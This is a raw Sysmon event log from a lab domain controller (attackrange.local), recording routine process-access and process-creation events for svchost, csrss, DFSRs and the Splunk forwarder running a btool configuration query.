10341000x80000000000000001818Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.783{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001817Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.783{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001816Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.783{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E58-6005-4500-00000000A301}3912C:\Program 
Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001815Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.783{59A5CD1D-8E58-6005-4400-00000000A301}39003904C:\Windows\system32\cmd.exe{59A5CD1D-8E58-6005-4500-00000000A301}3912C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001814Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.783{59A5CD1D-8E58-6005-4500-00000000A301}3912C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{59A5CD1D-8E58-6005-4400-00000000A301}3900C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-log 10341000x80000000000000001813Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.767{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E58-6005-4400-00000000A301}3900C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001812Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.767{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001811Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.767{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001810Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.767{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001809Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.767{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001808Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.767{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001807Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.767{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001806Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.767{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001805Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.767{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001804Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.767{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001803Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.767{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E58-6005-4400-00000000A301}3900C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001802Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.767{59A5CD1D-8E58-6005-3C00-00000000A301}37083712C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{59A5CD1D-8E58-6005-4400-00000000A301}3900C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+14ab4|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+d1d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001801Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.778{59A5CD1D-8E58-6005-4400-00000000A301}3900C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8E58-6005-3C00-00000000A301}3708C:\Program 
Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000001800Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.736{59A5CD1D-8E58-6005-4300-00000000A301}38603864C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001799Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.705{59A5CD1D-8E46-6005-1600-00000000A301}15442092C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+261b7|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001798Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.705{59A5CD1D-8E46-6005-1600-00000000A301}15442092C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+25d35|C:\Windows\system32\wbem\wmiprvsd.dll+2619d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000001797Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.705{59A5CD1D-8E46-6005-1600-00000000A301}15442092C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x80000000000000001796Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.705{59A5CD1D-8E46-6005-1600-00000000A301}15442092C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001795Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.705{59A5CD1D-8E46-6005-1600-00000000A301}15442092C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+264a1|C:\Windows\system32\wbem\wmiprvsd.dll+2669f|C:\Windows\system32\wbem\wmiprvsd.dll+25c4b|C:\Windows\system32\wbem\wmiprvsd.dll+27476|C:\Windows\system32\wbem\wmiprvsd.dll+27db2|C:\Windows\system32\wbem\wmiprvsd.dll+277c9|C:\Windows\system32\wbem\wmiprvsd.dll+26100|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x80000000000000001794Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.705{59A5CD1D-8E46-6005-1600-00000000A301}15442092C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+264a1|C:\Windows\system32\wbem\wmiprvsd.dll+2669f|C:\Windows\system32\wbem\wmiprvsd.dll+25c4b|C:\Windows\system32\wbem\wmiprvsd.dll+27476|C:\Windows\system32\wbem\wmiprvsd.dll+27db2|C:\Windows\system32\wbem\wmiprvsd.dll+277c9|C:\Windows\system32\wbem\wmiprvsd.dll+26100|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x80000000000000001793Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.705{59A5CD1D-8E56-6005-2F00-00000000A301}22763144C:\Windows\system32\DFSRs.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmidcprv.dll+163a4|C:\Windows\system32\wbem\wmidcprv.dll+166e0|C:\Windows\system32\wbem\wmidcprv.dll+abad|C:\Windows\system32\wbem\wmidcprv.dll+b57e|C:\Windows\system32\wmidcom.dll+58a6|C:\Windows\system32\wmidcom.dll+5464|C:\Windows\system32\wmidcom.dll+5495|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001792Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
